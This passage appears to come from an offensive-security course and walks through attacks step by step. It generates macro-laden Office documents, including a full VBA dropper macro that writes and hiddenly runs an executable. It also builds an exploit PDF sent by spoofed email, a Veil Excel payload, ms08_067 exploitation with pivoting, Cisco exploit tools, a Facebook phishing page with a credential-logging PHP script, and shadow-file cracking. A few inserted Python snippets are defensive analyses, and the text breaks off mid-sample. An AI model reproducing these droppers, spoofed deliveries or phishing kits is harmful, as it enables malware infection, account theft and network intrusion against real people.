You will then see a new menu similar to the one below. Choose option 2 "The Microsoft Office Macro on Windows".

|1| Microsoft Stack overflow in MSCOMCTL.OCX
|2| The Microsoft Office Macro on Windows
|3| The Microsoft Office Macro on Mac OS X
|4| Apache OpenOffice on Windows (PSH)
|5| Apache OpenOffice on Linux/OSX (Python)
|6| Exit

┌─[TheFatRat]──[~]─[microsploit]:
└─────► 2

It will then prompt you to enter LHOST, LPORT, a file name and the document body. Once the document body is entered, it asks whether you want a custom exe file backdoor; enter n. Afterwards, select any payload you like.

Worked on Microsoft Office on Windows

Your local IPV4 address is : 192.168.3.103
Your local IPV6 address is : fe80::20c:29ff:fe3d:718a
Your public IP address is : 101.50.81.19
Your Hostname is : ntl-50-81-19.nayatel.com

Set LHOST IP: 192.168.3.103
Set LPORT: 4444
Enter the base name for output files : MyDocFile
Enter the message for the document body (ENTER = default) : Hi This is a malicious doc file.
Are u want Use custom exe file backdoor ( y/n ): n

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

+-------------------------------------------+
| [ 1 ] windows/shell_bind_tcp              |
| [ 2 ] windows/shell/reverse_tcp           |
| [ 3 ] windows/meterpreter/reverse_tcp     |
| [ 4 ] windows/meterpreter/reverse_tcp_dns |
| [ 5 ] windows/meterpreter/reverse_http    |
| [ 6 ] windows/meterpreter/reverse_https   |
+-------------------------------------------+

Choose Payload :3

It automatically creates a macro-enabled Word document named "MyDocFile", saved to the output folder in the FatRat directory.

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.3.103
| LPORT || The Listen Ports || 4444
| OUTPUTNAME || The Filename output || MyDocFile
| PAYLOAD || Payload To Be Used || windows/meterpreter/reverse_tcp
+------------++-------------------------++-----------------------+

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Backdoor doc Saved To : /root/FatRat/output/MyDocFile.docm

Press [ENTER] key to return to menu

Now we need to start a handler in msfconsole: type msfconsole in a terminal and start a listener as before. As soon as the user opens the malicious Word document, we get a reverse connection.

PDF Exploit
We start by loading msfconsole. Once it is loaded, we want to create a malicious PDF that gives the victim a sense of security in opening it.
We are going to use the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.
Adobe Reader is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application, or to crash the application, denying service to legitimate users. So we start by creating our malicious PDF file for use in this client-side attack.

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME PrivacyPolicy.pdf
FILENAME => PayPolicy.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(adobe_utilprintf) > exploit

Before we send the malicious file to our victim we need to set up a listener to capture the reverse connection. We will use msfconsole to set up our multi/handler listener.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(handler) > exploit

Now that our listener is waiting for its payload, we have to deliver it to the victim. Since during information gathering we obtained the email address of the IT department, we will use a handy little script called sendEmail to deliver the payload. With a one-liner we can attach the malicious PDF, use any SMTP server we want and write a convincing email from any address we want.

root@kali:~# sendEmail -t [email protected] -f [email protected] -s 192.168.1.104 -u Pay policy renewal -a /root/.msf4/local/PrivacyPolicy.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

We are updating the policy

Sincerely,
Tech

As we can see, the script lets us set any FROM (-f) address, any TO (-t) address and any SMTP (-s) server, as well as the subject (-u) and our malicious attachment (-a). Once we have done that and pressed Enter, we can type any message we want, then press CTRL+D to send the email to the victim.
Now on the victim's machine, our IT department employee is getting in for the day and logging into his computer to check his email.
Clicking the file opens Adobe Reader but shows a greyed-out window that never reveals a PDF. Instead, on the attacker's machine what is revealed.

VBScript Infection

Metasploit has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads; you can also use your own custom payloads. To begin, we first need to create our VBScript payload:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.122 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
Ufwdk12
End Sub

Sub Ufwdk12()
Dim Ufwdk7 As Integer
Dim Ufwdk1 As String
Dim Ufwdk2 As String
Dim Ufwdk3 As Integer
Dim Ufwdk4 As Paragraph
Dim Ufwdk8 As Integer
Dim Ufwdk9 As Boolean
Dim Ufwdk5 As Integer
Dim Ufwdk11 As String
Dim Ufwdk6 As Byte
Dim Juxobelrhb as String
Juxobelrhb = "Juxobelrhb"
Ufwdk1 = "RYoCwIWYs.exe"
Ufwdk2 = Environ("USERPROFILE")
ChDrive (Ufwdk2)
ChDir (Ufwdk2)
Ufwdk3 = FreeFile()
Open Ufwdk1 For Binary As Ufwdk3
For Each Ufwdk4 in ActiveDocument.Paragraphs
DoEvents
Ufwdk11 = Ufwdk4.Range.Text
If (Ufwdk9 = True) Then
Ufwdk8 = 1
While (Ufwdk8 < Len(Ufwdk11))
Ufwdk6 = Mid(Ufwdk11,Ufwdk8,4)
Put #Ufwdk3, , Ufwdk6
Ufwdk8 = Ufwdk8 + 4
Wend
ElseIf (InStr(1,Ufwdk11,Juxobelrhb) > 0 And Len(Ufwdk11) > 0) Then
Ufwdk9 = True
End If
Next
Close #Ufwdk3
Ufwdk13(Ufwdk1)
End Sub

Sub Ufwdk13(Ufwdk10 As String)
Dim Ufwdk7 As Integer
Dim Ufwdk2 As String
Ufwdk2 = Environ("USERPROFILE")
ChDrive (Ufwdk2)
ChDir (Ufwdk2)
Ufwdk7 = Shell(Ufwdk10, vbHide)
End Sub

Sub AutoOpen()
Auto_Open
End Sub

Sub Workbook_Open()
Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Juxobelrhb
... (continued)

As the output message indicates, the script has two parts: the first is created as a macro and the second is appended to the document text itself. You need to transfer the script to a Windows machine with Microsoft Office installed.
Create a new Word document and open it. Copy the payload hex code into the document.

Go to View -> Macros -> Record Macro and select Keyboard.

Close the new dialog box.

Stop the recording.

Now go to View -> Macros and click Create.

Paste the macro code from Kali Linux, making sure you remove the previous code before pasting the new one.

Save the file. Now we need to start a listener on Kali Linux.

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.122
LHOST => 192.168.3.122
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > run

Send the Word file to the target; as soon as he opens the file, a reverse shell is created.
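
The generated macro above has a recognisable shape: an auto-exec entry point, Environ and ChDir into the user profile, Open ... For Binary and Put # to write a file, Shell(..., vbHide) to run it, and a run of &Hxx payload data in the document. The Python below is an added example (not part of the course material) that turns those observations into a static triage check of the kind a mail gateway or analyst applies before a document reaches a user; the three macro sources it classifies are constructed for the example.

```python
"""Static triage of a VBA macro for dropper behaviour.

Added example, not part of the course material. It checks for the indicators
visible in the generated macro above: auto-exec entry points, Environ and ChDir
into the user profile, 'Open ... For Binary' with 'Put #' to write a file,
Shell(..., vbHide) to run it, and runs of &Hxx payload data. The three macro
sources below are constructed, not taken from any real document.
"""
import re
from dataclasses import dataclass, field

AUTOEXEC = re.compile(
    r"\bSub\s+(Auto_?Open|Auto_?Close|AutoExec|Document_Open|Workbook_Open)\b", re.I)

# key -> (description, pattern); dict order is the order findings are reported.
INDICATORS = {
    "env": ("reads environment via Environ()", re.compile(r"\bEnviron\s*\(", re.I)),
    "chdir": ("changes working directory (ChDir)", re.compile(r"\bChDir\b", re.I)),
    "binwrite": ("opens a file for binary write", re.compile(r"\bOpen\b.*\bFor\s+Binary\b", re.I)),
    "put": ("writes bytes with Put #", re.compile(r"\bPut\s+#", re.I)),
    "exec": ("executes a command (Shell / WScript.Shell)",
             re.compile(r"\bShell\s*\(|\bShell\s+\S|WScript\.Shell", re.I)),
    "hidden": ("hidden window (vbHide)", re.compile(r"\bvbHide\b", re.I)),
    "exe": ("references an .exe file name", re.compile(r"\.exe\b", re.I)),
    "hexblob": ("embedded &Hxx byte run", re.compile(r"(?:&H[0-9A-F]{2}){16,}", re.I)),
}
WRITE_KEYS = {"binwrite", "put", "hexblob"}


@dataclass
class MacroVerdict:
    autoexec: list[str] = field(default_factory=list)
    indicators: list[str] = field(default_factory=list)
    verdict: str = "clean"


def triage_macro(source: str) -> MacroVerdict:
    """Classify macro source as clean / suspicious / dropper from static indicators."""
    v = MacroVerdict()
    v.autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(source)}, key=str.lower)
    hits = [k for k, (_, rx) in INDICATORS.items() if rx.search(source)]
    v.indicators = [INDICATORS[k][0] for k in hits]
    writes = WRITE_KEYS.intersection(hits)
    if v.autoexec and writes and "exec" in hits:
        v.verdict = "dropper"      # runs on open, writes a file, executes it
    elif v.autoexec and (writes or "exec" in hits):
        v.verdict = "suspicious"   # runs on open and does one of the two
    return v


# Constructed samples. The dropper keeps only the indicator lines of the
# generated macro; the decode loop is left out on purpose.
DROPPER_MACRO = """\
Sub Auto_Open()
    Dim f As Integer
    Dim r As Integer
    Dim home As String
    home = Environ("USERPROFILE")
    ChDir (home)
    f = FreeFile()
    Open "update.exe" For Binary As f
    ' ... loop that decodes the &Hxx data below into the file (omitted) ...
    Put #f, , 0
    Close #f
    r = Shell("update.exe", vbHide)
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

' payload data marker, then the byte run:
""" + "&H4D&H5A&H90&H00" + "&H00" * 12 + "\n"

SUSPICIOUS_MACRO = """\
Sub Document_Open()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run "notepad.exe", 1
End Sub
"""

BENIGN_MACRO = """\
Sub FormatReport()
    Dim ws As Worksheet
    Set ws = ActiveSheet
    ws.Range("A1:F1").Font.Bold = True
    ws.Columns("A:F").AutoFit
End Sub
"""

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER_MACRO), ("suspicious", SUSPICIOUS_MACRO),
                       ("benign", BENIGN_MACRO)):
        v = triage_macro(src)
        print(f"{label}: {v.verdict}; autoexec={v.autoexec}; indicators={v.indicators}")
```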

Weaponizing Excel Worksheets Using Veil

Veil can be used to create a PowerShell payload that can be embedded in an Excel document. Start Veil-Evasion:

root@kali:~# veil-evasion

Select the powershell/shellcode_inject/virtual payload:

[menu>>]: use 28

=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: powershell/shellcode_inject/virtual loaded
Required Options:

Name            Current Value   Description
----            -------------   -----------

Available Commands:

    set         Set a specific option value
    info        Show information about the payload
    options     Show payload's options
    generate    Generate payload
    back        Go to the main menu
    exit        exit Veil-Evasion

[powershell/shellcode_inject/virtual>>]: generate

Select 1


=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

[>] Please enter the number of your choice: 1

Press Enter to accept the default payload, then enter the IP address and port.

[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: 192.168.3.103
[>] Enter value for 'LPORT': 8080
[>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2):

[*] Generating shellcode...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of c file: 1425 bytes

Give the payload file a name

[>] Please enter the base name for output files (default is 'payload'): excel_file
Language: powershell
Payload: powershell/shellcode_inject/virtual
Shellcode: windows/meterpreter/reverse_tcp
Options: LHOST=192.168.3.103 LPORT=8080

Payload File: /var/lib/veil-evasion/output/source/excel_file.bat
Handler File: /var/lib/veil-evasion/output/handlers/excel_file_handler.rc

Open the bat file located at /var/lib/veil-evasion/output/source/excel_file.bat in a text editor.
Copy the following portion


Create a new file named input.bat on desktop and paste the content in that file.

root@kali:~# cd Desktop/
root@kali:~/Desktop# gedit input.bat

Save the file. Now download the Python script https://www.dropbox.com/s/thwp7hgg3t6xsg3/macro_convert.py?dl=0 and run it:

root@kali:~/Desktop# python macro_convert.py input.bat output.txt
root@kali:~/Desktop# gedit output.txt

Copy all the content of output.txt.

On your Windows machine, create a new Excel file and save it in the macro-enabled format.


Save the file. Make sure the extension is .xlsm

Go to File -> Options


Go to Customize Ribbon and check the Developer checkbox.


Press OK. Now, under Developer, go to Visual Basic or press Alt + F11.

Right-click on VBAProject and insert a new module.

Copy all the code from output.txt into the Excel file.


Save and close the Visual Basic window.

Save and close the Excel file. On your Kali machine launch msfconsole; we need to create a listener:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 8080


LPORT => 8080
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.3.103:8080
[*] Starting the payload handler...

Now we will send our malicious file to the target. As soon as the target opens the file and enables the macro content, we will get a reverse shell.

[*] Sending stage (957999 bytes) to 192.168.3.102
[*] Meterpreter session 4 opened (192.168.3.103:8080 -> 192.168.3.102:59566) at 2016-11-22 10:48:13 -0500

meterpreter > shell

Process 6880 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]

Pivoting
Pivoting is the technique of using a compromised host (also referred to as a 'plant' or 'foothold') to "move" around inside a network: the first compromise is used to reach, and then compromise, systems that would otherwise be inaccessible. In this scenario we will use it to route traffic into a network that is not normally routable from the attacker's machine.
Let us attack the machine at 192.168.2.20. We will use ms08_067_netapi.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.2.20
RHOST => 192.168.2.20
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.2.20
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.2.20:1030) at 2015-11-05 04:41:27 -0500
meterpreter >


The exploit executed successfully and we now have a meterpreter shell. When we run the ifconfig command, we see that the target is connected to multiple networks.

meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:52
MTU : 1500
IPv4 Address : 192.168.2.20
IPv4 Netmask : 255.255.0.0

Interface 65540
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:5c
MTU : 1500
IPv4 Address : 192.170.1.3
IPv4 Netmask : 255.255.255.0

The second IP address 192.170.1.3 is another network that the target is connected to. We want
to leverage this newly discovered information and attack this additional network. Metasploit has
an autoroute meterpreter script that will allow us to attack this second network through our first
compromised machine.
We are interested in 192.170.1.0/24

meterpreter > run autoroute -s 192.170.1.0/24

[*] Adding a route to 192.170.1.0/255.255.255.0...
[+] Added route to 192.170.1.0/255.255.255.0 via 192.168.2.20
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table


====================

Subnet          Netmask          Gateway
------          -------          -------
192.170.1.0     255.255.255.0    Session 5

-p gives a list of all active routes.
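
Why a dual-homed host matters, shown as an added Python example that is not part of the manual or of Metasploit: it parses the meterpreter ifconfig listing shown above into the networks the host is attached to, reports which of them are reachable only through that host (the pivot candidates), and then applies the same longest-prefix lookup an ordinary routing table uses to decide which session a packet for 192.170.1.5 would be tunnelled through. The interface text and the Session 5 route entry are copied from the walkthrough above; the function and class names are my own. From the defender's side the first function is the useful one: any host that sits on two networks is a pivot point, and an inventory of such hosts is where a network segmentation review starts.

```python
import ipaddress
import re

# Constructed sample input: the interface listing that `ifconfig` printed in the
# meterpreter session above, on the dual-homed Windows XP host 192.168.2.20.
SAMPLE_IFCONFIG = """\
Interface 1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:52
MTU          : 1500
IPv4 Address : 192.168.2.20
IPv4 Netmask : 255.255.0.0

Interface 65540
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:5c
MTU          : 1500
IPv4 Address : 192.170.1.3
IPv4 Netmask : 255.255.255.0
"""


def attached_networks(ifconfig_text):
    """Networks the host is directly attached to, derived from ifconfig output.

    Each interface block contributes one network (address AND netmask); blocks
    without a netmask (the loopback interface here) are ignored.
    """
    networks = []
    for block in re.split(r"\n\s*\n", ifconfig_text.strip()):
        addr = re.search(r"IPv4 Address\s*:\s*(\S+)", block)
        mask = re.search(r"IPv4 Netmask\s*:\s*(\S+)", block)
        if addr and mask:
            net = ipaddress.ip_network(f"{addr.group(1)}/{mask.group(1)}", strict=False)
            if not net.is_loopback:
                networks.append(net)
    return networks


def pivot_candidates(ifconfig_text, entry_network):
    """Networks that are reachable only through this host.

    `entry_network` is the network the host was reached on; every other attached
    network is hidden behind it and is what `autoroute -s` would be pointed at.
    """
    entry = ipaddress.ip_network(entry_network)
    return [n for n in attached_networks(ifconfig_text) if n != entry]


class RouteTable:
    """A session-keyed route table like the one `run autoroute -p` prints."""

    def __init__(self):
        self.routes = []  # list of (network, session_id)

    def add(self, subnet, netmask, session_id):
        self.routes.append((ipaddress.ip_network(f"{subnet}/{netmask}"), session_id))

    def lookup(self, destination):
        """Session a packet for `destination` is tunnelled through.

        Longest-prefix match over the table; None means no route covers the
        address, so the framework would send the packet out directly.
        """
        dst = ipaddress.ip_address(destination)
        matches = [(net, sid) for net, sid in self.routes if dst in net]
        if not matches:
            return None
        return max(matches, key=lambda m: m[0].prefixlen)[1]


if __name__ == "__main__":
    entry = "192.168.0.0/16"  # the /16 the attacker at 192.168.0.6 shares with the target
    for net in pivot_candidates(SAMPLE_IFCONFIG, entry):
        print(f"hidden network behind 192.168.2.20: {net}")
    table = RouteTable()
    table.add("192.170.1.0", "255.255.255.0", 5)  # the entry autoroute added above
    print("192.170.1.5 ->", table.lookup("192.170.1.5"))  # session 5
    print("192.168.0.6 ->", table.lookup("192.168.0.6"))  # None: sent directly
```

Run against the real output of a session, `attached_networks` is the quick test for whether a host is worth routing through at all; the `RouteTable` lookup is what makes the later port scan of 192.170.1.0/24 leave through Session 5 rather than the attacker's own interface.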


Now that we have added our additional route, we will escalate to SYSTEM and background our meterpreter session by pressing Ctrl-Z or with the background command.

Next we need to determine whether there are other systems on this second network we have discovered. We will use a basic TCP port scanner to look for ports 139 and 445.

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.170.1.0/24
RHOSTS => 192.170.1.0/24
msf auxiliary(tcp) > set PORTS 80,139,445
PORTS => 80,139,445
msf auxiliary(tcp) > set THREADS 100
THREADS => 100
msf auxiliary(tcp) > run

It will take some time to scan the whole network; you can increase the number of THREADS to speed up the process. You will get a result like the following:

[*] 192.170.1.1: - 192.170.1.1:80 - TCP OPEN
[*] 192.170.1.5: - 192.170.1.5:445 - TCP OPEN
[*] 192.170.1.5: - 192.170.1.5:139 - TCP OPEN
[*] 192.170.1.3: - 192.170.1.3:139 - TCP OPEN
[*] 192.170.1.3: - 192.170.1.3:445 - TCP OPEN

Another machine, 192.170.1.5, is active on the network, so we will try ms08_067 on it as well.

msf > use exploit/windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > set RHOST 192.170.1.5
RHOST => 192.168.3.116
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] 192.170.1.5:445 - Automatically detecting the target...
[*] 192.170.1.5:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.170.1.5:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.170.1.5:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.170.1.5
[*] Meterpreter session 3 opened (192.167.0.6-192.168.2.20:0 -> 192.170.1.5:4434) at 2016-11-08 08:30:10 -0500

meterpreter >

We run the ifconfig command:

meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:c1:1e:28
MTU : 1500
IPv4 Address : 192.170.1.5
IPv4 Netmask : 255.255.255.0

As you can see, pivoting is an extremely powerful feature and is a critical capability to have on
penetration tests.


Cisco Exploits
Cisco Global Exploiter (CGE)
CGE is a simple Perl-driven exploit engine for testing vulnerabilities in Cisco switches and
routers. CGE can exploit the following 14 vulnerabilities:
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
Launch Cisco Global Exploiter:

root@kali:# cd /usr/bin
root@kali:/usr/bin# perl cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability


[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

The syntax to use it is:

perl cge.pl <target> <vulnerability_number>

Cisco Exploitation through Metasploit

Metasploit also has a few Cisco exploits. You can browse through them in msfconsole:

msf > search cisco

Phishing
Phishing is a way of attempting to acquire information such as usernames, passwords, and
credit card details by masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction sites, online payment
processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is
typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter
details at a fake website whose look and feel are almost identical to the legitimate one. Phishing
is an example of social engineering techniques used to deceive users, and exploits the poor
usability of current web security technologies. Attempts to deal with the growing number of
reported phishing incidents include legislation, user training, public awareness, and technical
security measures.
Creating a Phishing Page:
Let’s consider facebook.com as an example here.
1. View source of facebook.com and copy all the text to notepad.
2. Search for “action” in code.
3. Delete the link given against action and replace it with login.php
4. Change method=post to method=get.


5. Save the file as index.html.

6. Create a new file in Notepad with the following code:

<?php
// Redirect the browser to the real login page, then append every submitted
// field to passwords.txt as name=value, one per line.
header("Location: http://www.Facebook.com/login.php");
$handle = fopen("passwords.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

7. Save it as login.php.
8. Create another file and save it as passwords.txt.
9. Upload these files to your web server.
10. Your phishing page is ready and can be accessed through your web server.
11. All usernames and passwords will be saved in passwords.txt.

John the Ripper


John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are
officially supported, not counting different architectures), Windows, DOS, BeOS, and
OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3)
password hash types most commonly found on various Unix flavors, supported out of the box
are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more
hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed
patches. [9]


root@kali:~# john
Created directory: /root/.john
John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-sse2]
Copyright (c) 1996-2015 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]


--single[=SECTION] "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE] like --wordlist, but fetch words from a .pot file
--dupe-suppression suppress all dupes in wordlist (and force preload)
--prince[=FILE] PRINCE mode, read words from FILE
--encoding=NAME input encoding (eg. UTF-8, ISO-8859-1). See also
doc/ENCODING and --list=hidden-options.
--rules[=SECTION] enable word mangling rules for wordlist modes
--incremental[=MODE] "incremental" mode [using section MODE]
--mask=MASK mask mode using MASK
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--external=MODE external mode or word filter
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
--session=NAME give a new session the NAME
--status[=NAME] print status of a session [called NAME]
--make-charset=FILE make a charset file. It will be overwritten
--show[=LEFT] show cracked passwords [if =LEFT, then uncracked]
--test[=TIME] run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..] load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] load salts with[out] COUNT [to MAX] hashes
--save-memory=LEVEL enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL this node's number range out of TOTAL count
--fork=N fork N processes
--pot=NAME pot file to use
--list=WHAT list capabilities, see --list=help or doc/OPTIONS
--format=NAME force hash of type NAME. The supported formats can
be seen with --list=formats and --list=subformats

1. Open terminal
2. Type the following command:

root@root:~# unshadow /etc/passwd /etc/shadow > crack


3. The unshadow command combines the data of /etc/passwd and /etc/shadow to create one file with the username and password details of all users of your Linux machine.
4. Now you can use this newly created file to crack the passwords of your Linux machine:

root@root:~# john crack

5. You can also type the following command:

john --wordlist=/usr/share/john/password.lst crack

6. To see the cracked passwords:

john --show crack

7. In the above screenshot, one can see that JTR has cracked two passwords with the following credentials:
a. Username: test password: password
b. Username: new password: password
8. JTR was not able to crack the root password since it was not in the wordlist provided.
9. Alternatively you can download or create your own wordlists for password cracking.
10. To do a bruteforce attack one can use the following commands:
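
To make step 3 concrete: an added Python example, not part of the manual or of John the Ripper, of the merge that unshadow performs (take each /etc/passwd line and replace the x in its second field with the hash from the matching /etc/shadow line), followed by a small audit that tells an administrator which entries need attention before any cracker is involved: accounts with an empty password field, locked accounts, and accounts with no shadow entry at all. The passwd and shadow lines are constructed and the hash strings are placeholders that only imitate the $6$salt$hash layout, not real hashes; `unshadow_merge`, `audit_entries` and `crackable_users` are names of my own.

```python
# Constructed sample input. The hash strings are placeholders that only imitate
# the $6$salt$hash layout of sha512crypt; they are not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
test:x:1000:1000:Test User:/home/test:/bin/bash
new:x:1001:1001::/home/new:/bin/bash
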